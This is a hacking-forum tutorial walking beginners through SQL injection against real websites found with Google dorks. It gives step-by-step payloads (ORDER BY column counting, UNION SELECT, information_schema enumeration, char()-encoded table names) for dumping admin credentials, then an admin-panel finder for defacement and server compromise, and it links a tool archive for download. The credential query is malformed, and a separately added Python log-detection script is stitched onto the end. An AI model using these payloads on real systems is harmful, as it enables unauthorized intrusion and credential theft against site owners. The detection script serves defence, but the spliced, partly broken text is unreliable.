[TUT] SQL Injection Tutorial for Beginners

Hello fellow Bz members. I've been wanting to post a tut on SQL injection and here goes my take on it. Also please please leave me feedback and any suggestions. Thanks

What exactly is SQL Injection?

SQL Injection is a code injection technique that exploits a security vulnerability in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements, or is not strongly typed and is therefore executed unexpectedly as part of the query. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.

What will I need to perform an SQL Injection attack?

[+] exploit scanner
[+] a good list of "google dorks"
[+] admin finder
[+] half a brain and the will to learn lol

I have provided all but 2 (in a .rar package available for download below) of the stated things above that you need. Also provided is a virus scan of the .rar for the skeptics lol

CLICK HERE TO DOWNLOAD THE TOOLS

Ok, after you are done downloading the tools, open the .rar located on your desktop. Now open the .txt called "dorks". From this list you can pick any dork you feel like scanning with. For good search results, search for a dork like this.

Code:
index.php?id=

http://i825.photobucket.com/albums/z...HaXz/sqli1.jpg

After you have done this you're going to want to switch your "Max Url" from 100 to 1000 for a lot more search results. Then press Scan on your exploit scanner. After it is done scanning, press "Test Sites". After all this is done you should have two lists and it should look like this.

http://i825.photobucket.com/albums/z...HaXz/sqli2.jpg

After it is done testing all scanned sites, these pre-tested sites might be SQLi vulnerable, but you must first check each site individually.
To test an individual site, add a " ' " after the URL. For example:

Code:
sqlivulnerablesite.com/index.php?id=1'

Let's say for instance you found a site that might be vulnerable (or what you think may be a vulnerable site). If an error comes up on the web page, something like this:

Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

then the quote reached the database unescaped and the site is likely injectable. The next step is to find out how many columns the query returns, starting from 1:

Code:
sqlivulnerablesite.com/index.php?id=1 order by 1--

Knowing that there is at least 1 column in this query, we do another code injection. Like this:

Code:
sqlivulnerablesite.com/index.php?id=1 order by 2--

Usually if the page loads correctly after trying #2, I try stepping the number up to around 10.

*NOTE* If you load the web page on a code injection like this:

Code:
sqlivulnerablesite.com/index.php?id=1 order by 10--

and get an error like this:

Code:
Unknown column '10' in 'order clause'

then the query has fewer than 10 columns, so step the number back down until the page loads normally again. Here that happens at 9, so the query has 9 columns:

Code:
sqlivulnerablesite.com/index.php?id=1 order by 9--

The next step in this attack is to find out which column is vulnerable to our attack, i.e. which one is actually displayed on the page. We use this code injection in the address bar after the vulnerable site. Like this:

Code:
sqlivulnerablesite.com/index.php?id=1 union all select 1,2,3,4,5,6,7,8,9--

The column number that shows up on the page is the one whose output we can read. Here it is column 2, so that is where we put the value we want to see, starting with the database version:

Code:
sqlivulnerablesite.com/index.php?id=1 union all select 1,@@version,3,4,5,6,7,8,9

Next, list the table names from information_schema:

Code:
sqlivulnerablesite.com/index.php?id=1 union all select 1,table_name,3,4,5,6,7,8,9 from information_schema.tables--

Then list the columns of the table you are interested in, giving the table name as char() codes (x stands for the comma-separated ASCII codes of the name):

Code:
sqlivulnerablesite.com/index.php?id=1 union all select 1,column_name,3,4,5,6,7,8,9 from information_schema.columns where table_name=char(x)--

Now we must find the ASCII values of the word admins.
GO HERE TO CONVERT TEXT TO ASCII

The ASCII values of admins are

Code:
&#97;&#100;&#109;&#105;&#110;&#115;

which, stripped down to just the numbers, is

Code:
97,100,109,105,110,115

Code:
sqlivulnerablesite.com/index.php?id=1 union all select 1,column_name,3,4,5,6,7,8,9 from information_schema.columns where table_name=char(97,100,109,105,110,115)--

Code:
sqlivulnerablesite.com/index.php?id=1 union all select 1,concat(username),0x3a,(password),3,4,5,6,7,8,9 from --

When the page loads it should show the username and password data for cpanel access. Now to access the cpanel we must find the login page. I provided an admin finder.exe in the .rar. Open it up and type in the URL of your vulnerable site. From there it scans until it finds the login page for admin cpanel access, which can lead to defacement and web server compromise.

Hopefully someone found this thread useful/helpful. I take full credit in writing this tutorial out. PM me if you need any further help with your sql injections!
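The probing sequence walked through above (stray quote, order by column counting, union select, information_schema lookups, char()-encoded names) leaves a recognizable trail in web server access logs. As an added example that is not part of the original post, here is a small Python scanner that flags those indicators in Common Log Format lines and picks out clients that run several stages of the sequence; the sample log lines, the indicator names and the three-indicator threshold are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Indicators for the probing steps shown in the post: a bare quote after id=, ORDER BY column
# counting, UNION SELECT, @@version, information_schema enumeration and char()-encoded names.
SQLI_PATTERNS = {
    "quote_probe": re.compile(r"[?&]id=\d+'"),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+\s*--", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "version_probe": re.compile(r"@@version", re.I),
    "schema_enum": re.compile(r"\binformation_schema\.(?:tables|columns)\b", re.I),
    "char_encoding": re.compile(r"\bchar\(\s*\d+(?:\s*,\s*\d+)*\s*\)", re.I),
}
# Common Log Format: client ident user [time] "METHOD path HTTP/x" status bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) \S+')

def classify_request(path):
    """Return the set of indicator names matched by the URL-decoded request path."""
    decoded = unquote_plus(path)
    return {name for name, rx in SQLI_PATTERNS.items() if rx.search(decoded)}

def scan_log(lines):
    """Return (client, path, status, sorted indicators) for every request that matches."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            client, path, status = m.groups()
            found = classify_request(path)
            if found:
                hits.append((client, path, int(status), sorted(found)))
    return hits

def probing_clients(hits, min_kinds=3):
    """Clients with >= min_kinds distinct indicators: a lone quote is noise, the walk-through is not."""
    kinds = {}
    for client, _path, _status, found in hits:
        kinds.setdefault(client, set()).update(found)
    return sorted(c for c, k in kinds.items() if len(k) >= min_kinds)

# Constructed sample log lines (not real traffic); the payloads are the ones shown in the post.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?id=1 HTTP/1.1" 200 5123',
    '203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?id=1%27 HTTP/1.1" 500 612',
    '203.0.113.7 - - [10/Oct/2023:13:55:44 +0000] "GET /index.php?id=1%20order%20by%2010-- HTTP/1.1" 500 640',
    '203.0.113.7 - - [10/Oct/2023:13:55:51 +0000] "GET /index.php?id=1%20union%20all%20select%201,@@version,3,4,5,6,7,8,9-- HTTP/1.1" 200 5200',
    '203.0.113.7 - - [10/Oct/2023:13:56:02 +0000] "GET /index.php?id=1%20union%20all%20select%201,column_name,3,4,5,6,7,8,9%20from%20information_schema.columns%20where%20table_name=char(97,100,109,105,110,115)-- HTTP/1.1" 200 5300',
    '198.51.100.4 - - [10/Oct/2023:14:01:10 +0000] "GET /search.php?q=o%27brien HTTP/1.1" 200 2200',
]
```

The second client's apostrophe in a search term matches nothing, which is the point of keying the quote check to the id parameter and of requiring several distinct indicator kinds before calling an address a prober.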